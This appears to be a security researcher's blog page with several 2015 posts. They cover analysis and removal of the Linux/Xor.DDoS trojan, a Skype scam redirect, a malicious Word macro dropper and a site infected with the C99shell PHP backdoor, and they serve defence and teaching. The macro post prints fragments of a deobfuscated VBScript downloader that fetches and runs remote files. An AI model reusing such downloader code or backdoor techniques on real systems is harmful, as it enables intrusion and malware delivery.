Search this Blog


Friday, September 25, 2015

Notes on Linux/Xor.DDoS

In this post we'll be focusing on a certain kind of malware: Linux/Xor.DDoS (also known as DDoS.XOR or Xorddos). As usual, we'll break the post down in several points:


The variant discussed in this blog post is an older variant, so certain infection mechanisms may have changed, as well as C&C's. The point of this post is to familiarize yourself with ELF malware in a better way - how to diagnose, analyse, remove and finally prevent malware from infecting your Linux machines. A lot of malware is going around and it's not (all) exclusively for Windows machines.

You may have heard about Linux/Xor.DDoS already, a Linux Trojan with rootkit capabilities (belonging to the category of 'ELF malware'). What exactly is an ELF file? According to Wikipedia:

In computing, the Executable and Linkable Format (ELF, formerly called Extensible Linking Format) is a common standard file format for executables, object code, shared libraries, and core dumps.
In other words: ELF is to Linux as PE (.exe, .com, .scr, ...) is to Windows and Mach-O to OS X.

There's a nice mini poster available by Corkami as well:


More information about the ELF format can also be found at the Resources section.

If you haven't heard about Linux/Xor.DDoS itself already, be sure to read the initial post by MalwareMustDie uncovering this malware:
Fuzzy reversing a new China ELF "Linux/XOR.DDoS"

In short: Xor.DDoS is a multi-platform, polymorphic malware for Linux OS and its ultimate goal is to DDoS other machines. The name Xor.DDoS stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs (command and control servers).

There have been other write-ups about this malware as well, which will be mentioned throughout this article or referenced in the Resources section.

How do you know you're infected with Xor.DDoS?

First and foremost (and obviously), you'll be conducting DDoS attacks from your machine(s) to targets chosen by the malware authors.

Sending of large SYN packets (Source)

You may use netstat to print any current network/internet connections. Use tcpdump to get a more detailed analysis of which packets you are sending out.

Secondly, another indication is seeing processes running with random names and sudden new executable files created in /etc/init.d/ or /usr/bin/ (see example below). New entries will be/are added to your crontab as well (/etc/crontab).

Malware running and its related files

You may use any command based on top or on ps to check for running malicious processes. We will see more in the Disinfection part of this blog post.

Thirdly, if you are running the standard OpenSSH server you may see an unauthorised but successful login and immediate logout afterwards.

These symptoms should be very clear, even more so if you've already implemented several measures to protect yourself from potential intruders. If not, then it'll be harder to track the infection origin as well. (but more often than not the SSH credentials of the root users are brute forced.)

To ensure your machines will not get pwned, be sure to read the Prevention part of this blog post.

First off, we have to identify how the malware entered the system. Usually, a weak root password is used (like admin or 123456, see here for a list of tried passwords. Note: huge .txt file!) or the attackers are brute forcing their way in. (brute forcing the SSH credentials of the root user) Another, but less common possibility, is exploiting a vulnerable service that you have running (Apache for example).

This figure is an excellent visual representation on how it all happens:


This variant copies itself over to /lib/, then creates a copy in /etc/init.d and a symbolic link to /usr/bin. Afterwards a new cron script is created and added to the crontab.

We will now take a look at one of the samples created - named bmtsfnlgxu.
(SHA1: b34b6f0ec42a0153c043b0665ec47bf6e5aac894)

Easiest way on Linux is to just use the "file" command:

We can see it's an ELF 32-bit executable for i386 - and it's not stripped.

Why is that last part important? strip allows you to remove symbols and sections from choosen files, which in turn makes it harder to reverse engineer (disassemble) as well. In this case, the file doesn't seem to be stripped, great! For example, we can see the source files and get an idea of what this malware does:
(this will also be shown later on in the video below, using IDA)

Moving on, we will start by using readelf for some further investigation of the file. We know, thanks to the file command, it's an ELF 32-bit executable for i386. Using readelf and parameter -h we will be able to gather more information:

This gives us more information already, for example; the magic (7F 45 4C 46 for ELF files, 4D 5A for MZ files)  2's complement, little endian,  the exact type of the file (an executable; other types for ELF files may be a relocatable file, a shared object, a core file or processor specific) but most importantly here being the Entry point address, or the start of the program.

In regards to readelf, using parameter -a we can dump a ton of information, you can find the output of this command on our malware on Pastebin: Xor.DDoS - "readelf -a" output

Note that VirusTotal has added (since November 2014) detailed ELF information in reports as well, which is more or less similar to readelf's output.

To disassemble the file, we can use objdump which allows us to disassemble only those sections which are expected to contain instructions (-d parameter) or to disassemble the contents of all sections (-D parameter).

However, to dive a bit deeper into the malware code, we will be using IDA, a multi-processor disassembler and debugger and Radare, a well-known (portable) reversing framework. Note that it will still be a quick glance, as MalwareMustDie has already reported extensively  about it as well [1][2][3][4]. Note also that it's always a good idea to analyse malware in a virtual environment (VM).

We will be using both tools on Windows, but you can just as easily run them on Linux or Mac.

I've made an instruction video on how to use IDA Pro Free to take a quick peek into the file discussed:

Download IDA Pro Free for Windows from here. If you're interested in working more with IDA, there's a handy list of IDA plugins available here.

... And just the same for Radare, where we will discover a bit more - namely the C&C of the malware:

Download radare2 for Windows from here. More documentation about Radare can be found here. There's also a handy cheat sheet available here.

If you like GUIs, then I have another useful utility: ELFparser. It will perform a scoring based on several factors, such as shell commands, HTTP functionality and process manipulation. For example, for our file:

You can see it's scored pretty highly. I wonder what it has to say about the hardcoded IP addresses..:

You can also see, Google's DNS server
and likely used to resolve the C&C domains

Great, it was able to extract our C&C servers: - VirusTotal - IPvoid - DomainTools (whois) - VirusTotal - IPvoid - DomainTools (whois)

Using ELFparser you can also look at the ELF header, sections, but also all of its capabilities like Information Gathering and Network Functions for example. It's a handy second-opinion tool.

Finally, one last tool which should not be missed when analysing ELF files: a sandbox. We will be using detux, a multiplatform Linux sandbox.

Connections to and

You have Network Analysis (IPs connected and DNS queries) and Static Analysis (Elf Info and Strings). In our example we have connections to, not an unfamiliar domain. View the complete report made by Detux on our file here.

It's worth noting that several months ago, I already sent a file to Detux (and VirusTotal) which yielded similar results:, another familiar player - and again dsaj2aX

Detux report of that file here. When I sent the latter file to VirusTotal several months ago, it only had 12 detections, after re-submitting it had 19 detections. That's better but we're still not there.
Just a visual representation of detection difference. Read this for info.

You may find an overview of all gathered files as well as most common/recurring domains and their IPs they connect to/download from here, available via AlienVault's OTX.

That's it for our Analysis section, let's move on to Disinfection.

Most importantly, you'd of course like to remove/disinfect this malware completely. Some pointers:

  • Identify malicious processes: run ps ef (ps stands for process status) to see which processes are running. Alternatively, you can use top or again ps with other parameters, for example ps ej or ps aux for a more complete, human readable table. Look for processes with random names; in our example it started with S90 and random letters afterwards, linked to files with all random names, as is the case in our example malware named bmtsfnlgxu.

    Once you've identified the malicious process(es), you can use the following command to find related files as well: for pid in $(ps -C -o pid=); do ls -la /proc/$pid/fd; done
    Where is the name of the suspicious process. This command will display any open, related files. For example, for bmtsfnlgxu it would be:
    for pid in $(ps -C bmtsfnlgxu -o pid=); do ls -la /proc/$pid/fd; done

  • Identify malicious files: look for newly created files in /etc/init.d/, /boot/ and /usr/bin/. Again, look for files with random names. You may also use the command ls -lat | head to view recently changed files.

    Check your crontab (/etc/crontab). Delete the malicious cron jobs, more specifically the cron.hourly jobs and in the case of Xor.DDoS they will be the following:

    */3 * * * * root /etc/cron.hourly/
    */3 * * * * root /etc/cron.hourly/

    Delete these two lines from your crontab. Don't forget to save. Delete the related files, located in /etc/cron.hourly. In our case, their content was as follows:

As said earlier, delete these files manually, as well as the file(s) mentioned in the scripts. (in this case: /lib/, /lib/ and /lib/ Note that these files are not related to GCC's runtime library and thus can be safely deleted. It's just another way how the malware tries to hide itself.

Also double-check there are no malicious files or scripts in /etc/rc.d. If so, remove them as well.

  • Stop and kill malicious processes: identify the parent process; usually it will be the one consuming the most CPU (which you can verify using any of the earlier commands, top being the easiest). Firstly, be sure to stop the parent process and wait for the child processes to die. Use the command: kill -STOP $pid

    When the child processes are dead, kill the parent by using: kill -9 $pid
    in case you see any other malicious processes, go through the last 2 commands again.

  • Delete any leftover malicious files: locations where the malware may reside have been indicated before, but to be complete:
    /etc/rcX.d (where X is a number)

That's it. Some additional tips and tricks: 
  • Use rm -rf to permanently remove a file. Be careful with this command.
  • Having troubles removing a file? Are you root? If not, try killing a process or deleting a file using root by prepending sudo before your command. For example: sudo kill -STOP $pid
  • Malicious process keeps coming back? Go over the steps again, but this time note down where the malware resides. Make that directory and its files unmodifiable by making use of the chattr command. For example, malware is being recreated in /usr/bin/. Use the command: chattr -R +i /usr/bin/ Then, stop the parent, wait for the children to die and kill the parent. Remove the files. Don't forget to use chattr again after you cleaned the infection. (in our example: chattr -R -i /usr/bin/)

    It's also possible the malware is temporarily storing files into /tmp/ while you are trying to kill its processes. When that happens, use the same chattr command on the /tmp/ directory and start over. If you are in doubt, use that chattr command on all aforementioned directories and start over. Very important: do not forget to use chattr -R -i on them afterwards!
  • In rare cases, the attacker may still be connected to your box. If possible, cut the internet connection and go over the disinfection steps. If this is not possible, firstly stop SSH by entering the command:
    sudo /etc/init.d/ssh stop

    Then, use iptables to drop any connection to the IPs the malware is connecting to (use netstat for example, see also Diagnosis) and to drop any connection from the attacker or cybercriminal. How to do this:

    In our example, we learned that our C&C's were and Thus, type or copy/paste these 2 commands:
    iptables -A OUTPUT -d -j DROP
    iptables -A OUTPUT -d -j DROP

    To block connection(s) from the attacker (you can find the attacker's IP using netstat for example):
    iptables -A INPUT -s $attackerIP -j DROP

    Don't forget to save your freshly created iptables rules by using the command
    /etc/init.d/iptables save

    Afterwards, change all passwords. (SSH, your user, root)

Best case scenario here is obviously:

  • restoring from a backup 
  • if the machine is virtual, restore to a previous snapshot
When you have either of these available, don't forget to change all passwords afterwards to prevent re-infection - and patch your machine(s)!

Some Xor.DDoS variants may also incorporate a rootkit. In that case, hope you have a "best case scenario" available to you. Once a box is fully compromised, it may be hard to reinstate it back to normal or its original state.

For double-checking for rootkits and other malware, you may want to check out chkrootkit. Alternatively, you can download and install an antivirus, for example ClamAV.

If you perform manual clean-up as indicated above and have confirmed all is in order again, you can install ClamAV and perform an extra scan to be sure. Better be safe than sorry. Then, follow the prevention tips below to stay safe.

  • Use strong passwords for SSH or use keys instead of passwords for authentication. You can read how to do that here. In the unlikely event of you not needing SSH to a particular machine, disable it on that machine by:
    sudo apt-get remove openssh-server

    To disable it from starting up you can use:
    update-rc.d -f ssh remove
  • Don't open the incoming SSH port (default 22) to ANY, but rather restrict it to trusted IP addresses.
  • Use a strong firewall. In Linux there are many options, iptables is a solid choice. A good basic iptables howto can be found here. In a network or if you need to protect several machines, you may want to consider a seperate hardware appliance as your firewall/UTM/... of choice.
  • Iptables can do a very decent job once properly configured. In case you want to do less manual work, I advise to check out sshguard or artillery. Both can monitor and alert you when something funky happens. In the context of our blog post, it also looks for & protects against SSH bruteforce attempts. Another application to consider is fail2ban. An additional tool is snort. For more information about these tools, refer to their pages.
  • Consider using SELinux. Security-Enhanced Linux is a compulsory access control security mechanism provided in the kernel.

  • Consider locking down cron jobs to only certain users. To deny all users from using cron you can use:
    echo ALL >>/etc/cron.deny
  • Consider disabling remote root login. Read how to do that here.
  • If you browse a lot, consider using NoScript as well.
  • Keep your software and applications up-to-date, as on any system.
  • Consider installing an antivirus as second opinion or at least as an additional layer. This is not a necessity but may come in handy. I recommend ClamAV.
  • Don't forget to protect other appliances that may be running on *nix systems, for example your router (and nowadays, IoT devices). Upgrade the firmware as soon as possible and change the default root/admin password(s). Install updates/patches for your particular firewall/UTM/... as well.
  • For even more (general) tips on hardening your Linux system (not against Xor.DDoS in particular):
    20 Linux Server Hardening Security Tips

Don't be fooled: Linux malware very much exists and starts to become more prevalent. Other prevalent Linux malware nowadays is:

  • Every ELF malware made by the ChinaZ actor or group (Linux/ChinaZ.DDoS, Linux/Kluh, ...)
  • Linux/Aes.DDoS (Dofloo, MrBlack)
  • Linux/Bash0day (Shellshock, Bashdoor)
  • Linux/BillGates (Gates.B)
  • Linux/Elknot (DnsAmp)
  • Linux/GoARM (Ramgo, Goram)
  • Linux/IptabLes and Linux/IptabLex

Note that this list is not complete and new ELF malware may pop up every day. (it's not a question of if, but when it will pop up) You can find a list of (interesting) Linux malware here.

Hopefully you have learned new things along the way of this blog post. For any specific questions, don't hesitate to leave a comment or contact me on Twitter: @bartblaze

To conclude this blog post, some acknowledgements and resources/references:


My colleague from Panda France, Julien Gourlaouen for informing me about this incident.

Everyone who helped, helps and will help in battling creators of ELF malware, in particular @MalwareMustDie for their excellent research and increasing awareness about these threats.

Last but not least, thank you for reading my blog post. 


AlienVault - Xor.DDoS hashes, IPs and domains (see also related pulses)
Avast -  Linux DDoS Trojan hiding itself with an embedded rootkit
Cisco -  Threat Spotlight: SSHPsychos
FireEye - Anatomy of a Brute Force Campaign: The Story of Hee Thai Limited
KernelMode - Linux/Xor.DDoS (samples)
KernelMode - List of Linux Malware
MalwareMustDie - Fuzzy reversing a new China ELF "Linux/XOR.DDoS"
MalwareMustDie - Linux/XorDDoS infection incident report (CNC: HOSTASA.ORG)
MalwareMustDie - A bad Shellshock & Linux/XOR.DDoS CNC "under the hood"
MalwareMustDie - Polymorphic in ELF malware: Linux/Xor.DDOS
Yale - ELF Format (PDF)

Friday, July 10, 2015

Scams spreading through Skype

I got a message today on Skype to check out an eBay page with my name on. Sounds great!

Hey $name! Look$username

Another example is:

However, the link was not exactly pointing to eBay:

Not eBay, but what appears to be

Turns out the actual link behind the eBay one is pointing to:

What follows after is for tracking and to disable the Redirect notice message from Google. For those who are curious, is a legitimate website of Google for the African country Djibouti.

The what seems to be random numbers is actually just hex for:

When you click the link, you will simply do a Google search for that webpage and visit it. This does not mean is compromised in any way. As an example, you can use the same link but instead use instead of

On the lengthy site mentioned above, you'll get a Javascript which you can view on this Pastebin link:
Scams spreading through Skype
(In short, it does a simple math.random method to serve you a slightly different website each time.)

Fiddler capture

Eventually, you'll end up on a typical weight loss scam website:

Obviously not the real Women's Health website

Trying to leave the website

Long story short.....


Install the WOT extension into your browser. (Compatible with most modern browsers)
WOT is a community-based tool and is therefore very useful for these kinds of scams, whereas other users can warn you about the validity.

Use a strong password for Skype and anything else for that matter.

Don't click on "funny" links. A trick is to "hover" on the link to reveal the actual website behind it.


Close your browser.

Change your Skype password immediately. How do I change my password?

If the message came from an unknown contact, How do I report abuse by someone in Skype?

If the message came from a friend, be sure to notify him/her and to follow the steps in this post.

To be sure, you can always run a scan with your favorite antivirus and/or antimalware product. (however, I have not seen any malware in this particular campaign)


In the past, malware has spread via Skype, but this is the first time I'm seeing a scam presented in this way. I have contacted Skype to ask how they were able to hide the actual website behind the eBay link, as I do not know - if you do, be sure to let me know in the comments.

Also, follow the steps above to stay safe.

Friday, May 29, 2015

CARO 2015 – wrap up

In May, I’ve visited the CARO workshop for the first time, representing Panda Security (not as a speaker, simply as an attendee).

What is CARO exactly? From their website:
CARO is an informal group of individuals who have been working together since around 1990 across corporate and academic borders to study the phenomenon of computer malware.

Besides meeting other people in this field, there were also a number of interesting presentations and case studies on malware as well. You can view the full program here:

In regards to the presentations, not everything is shared as malware authors are keeping themselves up-to-date as well about the latest anti-anti-evasion techniques, botnet takedown operations and whatnot. That being said, it was great to be there and seeing how great cooperation can be!

Presentations that are shared however can be found here:
Until next time!

Friday, May 8, 2015

New malicious Office docs trick

It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.

The content is as follows:


We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.

Attached is a DOC file with (surprise) a macro attached. However, the method's different than usual:

In the past, there have been some other new tricks as well, for example:
Analyzing an MS Word document not detected by AV software
XML: A New Vector For An Old Trick
Malware authors go a step further to access bank accounts

In regards to any Office files, you can simply open the file in Notepad++ for example and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"

You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens,
You can find a Pastebin here with the extracted + deobfuscated macro.

Short analysis of this .doc file using olevba

Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link

Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)

If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link was opened and the file was executed. Process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
JHyygUBjdfg.Open GET ,

dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
sdfsdfsdf.Open GET ,

Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99



It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:

Note: starting from Office 2010, macros are disabled by default.


Wednesday, March 4, 2015

C99Shell not dead

I recently got contacted on Twitter in regards to a hacked webpage:

After I received the files two things became apparent:

- the webserver (and thus the website) was infected with C99shell
- the webserver was infected with other PHP backdoors

PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example:

- download/upload files from and to the server (FTP functionality)
- run shell commands
- full access to all files on the hard disk
- ...

In short, it can pretty much do everything you want, which results in end-users getting malware onto their systems and/or data getting stolen and/or personal information compromised.

There's an excellent blog post over at Malwaremustdie in regards to C99shell, you can read it here:
How EVIL the PHP/C99Shell can be? From SQL Dumper, Hacktools, to Trojan Distributor Future?

Now, here's one of the files gathered from the webserver:

It's heavily obfuscated as one would expect; after some deobfuscating/decoding we get:

It also has a nice web interface:

Seems like we are dealing with a slightly updated version of C99shell, version 2.1:

And last but not least, some functionality:

You can find the decoded C99shell backdoor on Pastebin:
Decoded PHP/c99shell

Detections aren't too great for this PHP backdoor, but it surely has improved since Malwaremustdie started blogging about it, some VirusTotal results: 0, 1, 2.

As I mentioned before, other PHP backdoors were present, for example:

After some manual decoding, we turn up with the following interesting line:

Another example:

The "x-headers" HTTP_X_UP_CALLING_LINE_ID and HTTP_X_NOKIA_ALIAS are actually part of WML, the Wireless Markup Language.

Thus, this PHP backdoor seems specifically designed to target mobile users. I've put a copy of the script in screenshot above on Pastebin as well:
Unknown PHP backdoor

Darryl from Kahu Security has written an excellent post on how to manually decode this kind of PHP obfuscation: Deobfuscating a Wicked-Looking Script

If you have any information on what kind of PHP backdoor this might be (if not generic), feel free to let me know.


This shouldn't be repeated normally, but I will again just for good measure:

  • Take back-ups regularly! Yes, even for your website.
  • Keep your CMS up-to-date; whether you use WordPress, Joomla, Drupal, ... 
  • Keep your installed plugins up-to-date. Remove any unnecessary plugins.
  • Use strong passwords for your FTP account(s), as well as for your CMS/admin panel login.
  • Use appropriate file permissions - meaning don't use 777 everywhere. (seriously, don't)
  • Depending on how you manage your website - keep your operating system up-to-date and, if applicable, install and update antivirus software.
More (extended) tips can be found over at StopBadware:
Preventing badware: Basics

There are also guides available on how to harden your specific CMS installation, for example:
WordPress: Hardening WordPress
Joomla: Security Checklist/Joomla! Setup
Drupal: Writing secure code


What if your website's already been hacked and serving up malware to the unknowing visitor? Best practice is to simply take your website offline and restore from an earlier back-up. (don't forget to verify if your back-up isn't infected as well)

If that's not a possibility for whatever reason, you'll first need to find where any malicious code was injected (or created) on your website, or how it was infected in the first place.

An easy way would be to simply check all recently changed files on your web server. However, those dates can be altered. So what's a better alternative? You can comb over the files one by one, or you can use an online tool to check your website.

A short overview:
You can use Sucuri's SiteCheck to quickly spot if they detect any malware, see if you're blacklisted and, the most useful part in this case is to check whether or not you have any outdated plugin or CMS running - as well as a list of links.
Use Redleg's file viewer to easily see if any malicious iframes have been injected - you can even choose which Referrer and User Agent should be used (some malware requires you to visit the site via a specific Referrer or User Agent).
Useful additional tool to Redleg's file viewer. Allows you to only fetch headers of a website, or fetch both header and content.
Excellent tool in case any malicious Javascript (iframe) is injected into any of your web server files. Less intuitive, but provides a great overview.
Excellent tool and more graphical as opposed to JSunpack - especially useful is to see if any IDS was triggered as well as JavaScript and HTTP Transactions.
As usual, VirusTotal is a great resource as well - it can pinpoint which Antivirus (if any) is triggering an alert related to your website.
NBS System's PHP Malware Finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells.

If nothing is found using any of these tools, but you are still receiving reports from either blacklists (eg. Google) or users, you'll have to manually go over all your files to see if any code was attached. Another method (and obviously not foolproof) is to copy over all your files to a Windows system and scan them with an antivirus. I think you're starting to realize why back-ups are important.

If you had any outdated plugins running, chances are very high the backdoor or script was created/added in that specific directory. For example for WordPress this is typically:

You can also install a plugin for your CMS which can scan your web server for any infected files. (Which is ironic, but might still do the trick should you not be able to find anything manually.)

Last but not least: check your access logs! See any unauthorized (FTP) logins for example? Contact your hosting provider - they might be able to assist you as well.

If you're still stuck, feel free to shoot me an email or contact me on Twitter. Otherwise, contact one of X companies which can help you assist in clean-up.

Don't forget: after clean-up, reset all your passwords (and don't use the same for everything) and follow the prevention tips above, or you'll simply get infected again.


C99shell is obviously not dead and neither are other PHP backdoors - or any other malware for that matter. Securing your website is not only beneficial for you, but also for your customers and other visitors. This blog post should have provided you with the essentials on securing your website and cleaning it up should it ever be infected (repeating: best practice is to take it offline and restore from a back-up).


For webmasters:
StopBadware - My site has badware
Google - If your site is infected
Redleg - If you're having redirects ("Google says my site is redirecting to a malicious or spam site.")

For researchers:
Online JavaScript Beautifier -
PHP Formatter -
Kahu Security tools -
(for this specific blog post, PHP Converter is a must-use and very effective tool)
Base 64 Decoder -

Above list is obviously my own personal flavor, feel free to leave a comment with your favorite tool.